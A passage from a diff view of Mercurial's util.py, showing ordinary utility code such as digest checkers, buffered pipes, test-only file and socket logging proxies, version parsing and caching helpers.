util: lower water mark when removing nodes after cost limit reached...
Gregory Szorc
r39606:f296c0b3 default
@@ -1,3978 +1,3988 @@
# util.py - Mercurial utility functions and platform specific implementations
#
# Copyright 2005 K. Thananchayan <thananck@yahoo.com>
# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
# Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial utility functions and platform specific implementations.

This contains helper routines that are independent of the SCM core and
hide platform-specific details from the core.
"""

from __future__ import absolute_import, print_function

import abc
import bz2
import collections
import contextlib
import errno
import gc
import hashlib
import itertools
import mmap
import os
import platform as pyplatform
import re as remod
import shutil
import socket
import stat
import sys
import time
import traceback
import warnings
import zlib

from .thirdparty import (
    attr,
)
from hgdemandimport import tracing
from . import (
    encoding,
    error,
    i18n,
    node as nodemod,
    policy,
    pycompat,
    urllibcompat,
)
from .utils import (
    procutil,
    stringutil,
)

base85 = policy.importmod(r'base85')
osutil = policy.importmod(r'osutil')
parsers = policy.importmod(r'parsers')

b85decode = base85.b85decode
b85encode = base85.b85encode

cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr

if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username

try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

_notset = object()

def bitsfrom(container):
    bits = 0
    for bit in container:
        bits |= bit
    return bits

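# Example (editor's sketch, not part of the original file): bitsfrom() simply
# ORs together the flag bits found in a container:
#
#   import stat
#   bitsfrom([stat.S_IRUSR, stat.S_IWUSR])  # == 0o600
#   bitsfrom([])                            # == 0
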
# Python 2.6 still has deprecation warnings enabled by default. We do not
# want to display anything to the standard user, so we detect whether we are
# running tests and only use Python deprecation warnings in that case.
_dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
    warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                            r'mercurial')
    warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                            DeprecationWarning, r'mercurial')
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                            DeprecationWarning, r'mercurial')

def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python-native deprecation warning.

    This is a noop outside of tests; use 'ui.deprecwarn' when possible.
    """
    if _dowarn:
        msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                " update your code.)") % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)

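# Example (editor's sketch, not part of the original file): a caller
# deprecating an old helper; 'oldhelper' and 'newhelper' are hypothetical:
#
#   def oldhelper():
#       nouideprecwarn(b"oldhelper is deprecated, use newhelper", b"4.8",
#                      stacklevel=2)
#       return newhelper()
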
DIGESTS = {
    'md5': hashlib.md5,
    'sha1': hashlib.sha1,
    'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']

for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS

class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=''):
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_('unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        if key not in DIGESTS:
            raise error.Abort(_('unknown digest type: %s') % key)
        return nodemod.hex(self._hashes[key].digest())

    def __iter__(self):
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None

class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        if self._size != self._got:
            raise error.Abort(_('size mismatch: expected %d, got %d') %
                              (self._size, self._got))
        for k, v in self._digests.items():
            if v != self._digester[k]:
                # i18n: first parameter is a digest name
                raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                  (k, v, self._digester[k]))

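# Example (editor's sketch, not part of the original file): draining a
# digestchecker to verify a download; validate() raises error.Abort on any
# size or digest mismatch ('path', 'expectedsize' and 'expectedsha1' are
# hypothetical names):
#
#   fh = digestchecker(open(path, 'rb'), expectedsize,
#                      {'sha1': expectedsha1})
#   while fh.read(4096):
#       pass
#   fh.validate()
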
try:
    buffer = buffer
except NameError:
    def buffer(sliceable, offset=0, length=None):
        if length is not None:
            return memoryview(sliceable)[offset:offset + length]
        return memoryview(sliceable)[offset:]

_chunksize = 4096

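# Example (editor's sketch, not part of the original file): on Python 3,
# where the builtin buffer() no longer exists, the fallback above returns a
# memoryview slice, which references the source object without copying:
#
#   view = buffer(b'abcdef', 2, 3)
#   bytes(view) == b'cde'
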
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """
    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        self._buffer = []
        self._eof = False
        self._lenbuf = 0

    @property
    def hasbuffer(self):
308 """True is any data is currently buffered
308 """True is any data is currently buffered
309
309
310 This will be used externally a pre-step for polling IO. If there is
310 This will be used externally a pre-step for polling IO. If there is
311 already data then no polling should be set in place."""
311 already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapses it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data

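# Example (editor's sketch, not part of the original file): wrapping the read
# end of a child process pipe so buffered readline() can coexist with
# polling ('cmd' is a hypothetical argument list; poll() is the platform
# helper re-exported above):
#
#   import subprocess
#   proc = subprocess.Popen(cmd, stdout=subprocess.PIPE)
#   pipe = bufferedinputpipe(proc.stdout)
#   if pipe.hasbuffer or poll([pipe.fileno()]):
#       line = pipe.readline()
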
def mmapread(fp):
    try:
        fd = getattr(fp, 'fileno', lambda: fp)()
        return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return ''
        raise

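# Example (editor's sketch, not part of the original file): memory-mapping a
# file for read-only access; the result supports the buffer interface, so
# slicing avoids reading the whole file up front ('path' is hypothetical):
#
#   with open(path, 'rb') as fp:
#       data = mmapread(fp)
#   header = data[:4]
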
class fileobjectproxy(object):
    """A proxy around file objects that tells a watcher when events occur.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, fh, observer):
        object.__setattr__(self, r'_orig', fh)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed is a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __iter__(self):
        return object.__getattribute__(self, r'_orig').__iter__()

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

    def seek(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seek', *args, **kwargs)

    def seekable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'seekable', *args, **kwargs)

    def tell(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'tell', *args, **kwargs)

    def truncate(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'truncate', *args, **kwargs)

    def writable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writable', *args, **kwargs)

    def writelines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'writelines', *args, **kwargs)

    def read(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read', *args, **kwargs)

    def readall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readall', *args, **kwargs)

    def readinto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readinto', *args, **kwargs)

    def write(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'write', *args, **kwargs)

    def detach(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'detach', *args, **kwargs)

    def read1(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'read1', *args, **kwargs)

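# Example (editor's sketch, not part of the original file): an observer only
# needs methods matching the proxied calls it cares about; each receives the
# call's result followed by the original arguments, as _observedcall() above
# shows ('countingobserver' and 'path' are hypothetical):
#
#   class countingobserver(object):
#       def __init__(self):
#           self.bytesread = 0
#       def read(self, res, size=-1):
#           self.bytesread += len(res or b'')
#
#   fh = fileobjectproxy(open(path, 'rb'), countingobserver())
#   fh.read(100)  # routed through _observedcall('read', 100)
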
class observedbufferedinputpipe(bufferedinputpipe):
    """A variation of bufferedinputpipe that is aware of fileobjectproxy.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``. Because of this, we need to make
    ``bufferedinputpipe`` aware of these operations.

    This variation of ``bufferedinputpipe`` can notify observers about
    ``os.read()`` events. It also re-publishes other events, such as
    ``read()`` and ``readline()``.
    """
    def _fillbuffer(self):
        res = super(observedbufferedinputpipe, self)._fillbuffer()

        fn = getattr(self._input._observer, r'osread', None)
        if fn:
            fn(res, _chunksize)

        return res

    # We use different observer methods because the operation isn't
    # performed on the actual file object but on us.
    def read(self, size):
        res = super(observedbufferedinputpipe, self).read(size)

        fn = getattr(self._input._observer, r'bufferedread', None)
        if fn:
            fn(res, size)

        return res

    def readline(self, *args, **kwargs):
        res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        fn = getattr(self._input._observer, r'bufferedreadline', None)
        if fn:
            fn(res)

        return res

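# Editor's note (not part of the original file): bufferedinputpipe.__new__
# selects observedbufferedinputpipe automatically whenever the wrapped
# handle is a fileobjectproxy, so observers see both the low-level
# os.read() fills (via 'osread') and the buffered 'bufferedread' /
# 'bufferedreadline' calls layered on top of them.
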
PROXIED_SOCKET_METHODS = {
    r'makefile',
    r'recv',
    r'recvfrom',
    r'recvfrom_into',
    r'recv_into',
    r'send',
    r'sendall',
    r'sendto',
    r'setblocking',
    r'settimeout',
    r'gettimeout',
    r'setsockopt',
}

class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.
    """
    __slots__ = (
        r'_orig',
        r'_observer',
    )

    def __init__(self, sock, observer):
        object.__setattr__(self, r'_orig', sock)
        object.__setattr__(self, r'_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, r'_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, r'_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, r'_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, r'_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        res = object.__getattribute__(self, r'_observedcall')(
            r'makefile', *args, **kwargs)

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, r'_observer')
        return makeloggingfileobject(observer.fh, res, observer.name,
                                     reads=observer.reads,
                                     writes=observer.writes,
                                     logdata=observer.logdata,
                                     logdataapis=observer.logdataapis)

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv', *args, **kwargs)

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom', *args, **kwargs)

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recvfrom_into', *args, **kwargs)

    def recv_into(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'recv_into', *args, **kwargs)

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'send', *args, **kwargs)

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendall', *args, **kwargs)

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'sendto', *args, **kwargs)

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setblocking', *args, **kwargs)

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'settimeout', *args, **kwargs)

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'gettimeout', *args, **kwargs)

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'setsockopt', *args, **kwargs)

class baseproxyobserver(object):
    def _writedata(self, data):
        if not self.logdata:
            if self.logdataapis:
                self.fh.write('\n')
                self.fh.flush()
            return

        # Simple case writes all data on a single line.
        if b'\n' not in data:
            if self.logdataapis:
                self.fh.write(': %s\n' % stringutil.escapestr(data))
            else:
                self.fh.write('%s> %s\n'
                              % (self.name, stringutil.escapestr(data)))
            self.fh.flush()
            return

        # Data with newlines is written to multiple lines.
        if self.logdataapis:
            self.fh.write(':\n')

        lines = data.splitlines(True)
        for line in lines:
            self.fh.write('%s> %s\n'
                          % (self.name, stringutil.escapestr(line)))
        self.fh.flush()

class fileobjectobserver(baseproxyobserver):
    """Logs file object activity."""
    def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                 logdataapis=True):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        if not self.reads:
            return
        # Python 3 can return None from reads at EOF instead of empty strings.
        if res is None:
            res = ''

        if size == -1 and res == '':
            # Suppress pointless read(-1) calls that return
            # nothing. These happen _a lot_ on Python 3, and there
            # doesn't seem to be a better workaround to have matching
            # Python 2 and 3 behavior. :(
            return

        if self.logdataapis:
            self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))

        self._writedata(res)

    def readline(self, res, limit=-1):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readline() -> %d' % (self.name, len(res)))

        self._writedata(res)

    def readinto(self, res, dest):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                      res))

        data = dest[0:res] if res is not None else b''
        self._writedata(data)

    def write(self, res, data):
        if not self.writes:
            return

        # Python 2 returns None from some write() calls. Python 3 (reasonably)
        # returns the integer bytes written.
        if res is None and data:
            res = len(data)

        if self.logdataapis:
            self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))

        self._writedata(data)

    def flush(self, res):
        if not self.writes:
            return

        self.fh.write('%s> flush() -> %r\n' % (self.name, res))

    # For observedbufferedinputpipe.
    def bufferedread(self, res, size):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedread(%d) -> %d' % (
                self.name, size, len(res)))

        self._writedata(res)

    def bufferedreadline(self, res):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> bufferedreadline() -> %d' % (
                self.name, len(res)))

        self._writedata(res)

def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                          logdata=False, logdataapis=True):
    """Turn a file object into a logging file object."""

    observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                  logdata=logdata, logdataapis=logdataapis)
    return fileobjectproxy(fh, observer)

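# Example (editor's sketch, not part of the original file): logging every
# read on a file object, including escaped payload bytes ('logfh' and 'path'
# are hypothetical; 'logfh' must accept whatever the observer writes):
#
#   fh = makeloggingfileobject(logfh, open(path, 'rb'), b'input',
#                              writes=False, logdata=True)
#   fh.read(10)  # logs "input> read(10) -> 10: <escaped data>"
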
class socketobserver(baseproxyobserver):
    """Logs socket activity."""
    def __init__(self, fh, name, reads=True, writes=True, states=True,
                 logdata=False, logdataapis=True):
        self.fh = fh
        self.name = name
        self.reads = reads
        self.writes = writes
        self.states = states
        self.logdata = logdata
        self.logdataapis = logdataapis

    def makefile(self, res, mode=None, bufsize=None):
        if not self.states:
            return

        self.fh.write('%s> makefile(%r, %r)\n' % (
            self.name, mode, bufsize))

    def recv(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv(%d, %d) -> %d' % (
                self.name, size, flags, len(res)))
        self._writedata(res)

    def recvfrom(self, res, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                self.name, size, flags, len(res[0])))

        self._writedata(res[0])

    def recvfrom_into(self, res, buf, size, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                self.name, size, flags, res[0]))

        self._writedata(buf[0:res[0]])

    def recv_into(self, res, buf, size=0, flags=0):
        if not self.reads:
            return

        if self.logdataapis:
            self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                self.name, size, flags, res))

        self._writedata(buf[0:res])

    def send(self, res, data, flags=0):
        if not self.writes:
            return

        self.fh.write('%s> send(%d, %d) -> %d' % (
            self.name, len(data), flags, len(res)))
        self._writedata(data)

    def sendall(self, res, data, flags=0):
        if not self.writes:
            return

        if self.logdataapis:
            # Returns None on success. So don't bother reporting return value.
            self.fh.write('%s> sendall(%d, %d)' % (
                self.name, len(data), flags))

        self._writedata(data)

    def sendto(self, res, data, flagsoraddress, address=None):
        if not self.writes:
            return

        if address:
            flags = flagsoraddress
        else:
            flags = 0

        if self.logdataapis:
            self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                self.name, len(data), flags, address, res))

        self._writedata(data)

    def setblocking(self, res, flag):
        if not self.states:
            return

        self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))

    def settimeout(self, res, value):
        if not self.states:
            return

        self.fh.write('%s> settimeout(%r)\n' % (self.name, value))

    def gettimeout(self, res):
        if not self.states:
            return

        self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))

    def setsockopt(self, res, level, optname, value):
        if not self.states:
            return

        self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
            self.name, level, optname, value, res))

def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                      logdata=False, logdataapis=True):
    """Turn a socket into a logging socket."""

    observer = socketobserver(logh, name, reads=reads, writes=writes,
                              states=states, logdata=logdata,
                              logdataapis=logdataapis)
    return socketproxy(fh, observer)

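# Example (editor's sketch, not part of the original file): auditing a client
# socket's traffic and state changes during a test ('logfh', 'host' and
# 'port' are hypothetical):
#
#   import socket as socketmod
#   sock = socketmod.create_connection((host, port))
#   sock = makeloggingsocket(logfh, sock, b'client')
#   sock.sendall(b'ping')  # logs "client> sendall(4, 0)"
#   sock.settimeout(1.0)   # logs "client> settimeout(1.0)"
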
def version():
    """Return version information if available."""
    try:
        from . import __version__
        return __version__.version
    except ImportError:
        return 'unknown'

def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = b'3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = b'3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = b'3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = b'3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')

    >>> versiontuple(b'4.6rc0')
    (4, 6, None, 'rc0')
    >>> versiontuple(b'4.6rc0+12-425d55e54f98')
    (4, 6, None, 'rc0+12-425d55e54f98')
    >>> versiontuple(b'.1.2.3')
    (None, None, None, '.1.2.3')
    >>> versiontuple(b'12.34..5')
    (12, 34, None, '..5')
    >>> versiontuple(b'1.2.3.4.5.6')
    (1, 2, 3, '.4.5.6')
    """
    if not v:
        v = version()
    m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
    if not m:
        vparts, extra = '', v
    elif m.group(2):
        vparts, extra = m.groups()
    else:
        vparts, extra = m.group(1), None

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
1044 vints.append(int(i))
1045 except ValueError:
1045 except ValueError:
1046 break
1046 break
1047 # (3, 6) -> (3, 6, None)
1047 # (3, 6) -> (3, 6, None)
1048 while len(vints) < 3:
1048 while len(vints) < 3:
1049 vints.append(None)
1049 vints.append(None)
1050
1050
1051 if n == 2:
1051 if n == 2:
1052 return (vints[0], vints[1])
1052 return (vints[0], vints[1])
1053 if n == 3:
1053 if n == 3:
1054 return (vints[0], vints[1], vints[2])
1054 return (vints[0], vints[1], vints[2])
1055 if n == 4:
1055 if n == 4:
1056 return (vints[0], vints[1], vints[2], extra)
1056 return (vints[0], vints[1], vints[2], extra)
1057
1057
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keyword args
    if func.__code__.co_argcount == 0:
        cache = []
        def f():
            if len(cache) == 0:
                cache.append(func())
            return cache[0]
        return f
    cache = {}
    if func.__code__.co_argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def f(arg):
            if arg not in cache:
                cache[arg] = func(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                cache[args] = func(*args)
            return cache[args]

    return f

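# Illustrative sketch, not part of the original module: cachefunc
# memoizes by positional arguments, so a pure function is computed at
# most once per distinct argument tuple.
#
#   @cachefunc
#   def expensive(x):
#       return x ** x
#   expensive(10)  # computed
#   expensive(10)  # served from the cache dict
#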
class cow(object):
    """helper class to make copy-on-write easier

    Call preparewrite before doing any writes.
    """

    def preparewrite(self):
        """call this before writes, return self or a copied new object"""
        if getattr(self, '_copied', 0):
            self._copied -= 1
            return self.__class__(self)
        return self

    def copy(self):
        """always do a cheap copy"""
        self._copied = getattr(self, '_copied', 0) + 1
        return self

class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([(b'a', 2)])
    >>> list(d2.keys()) # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        if key in self:
            del self[key]
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
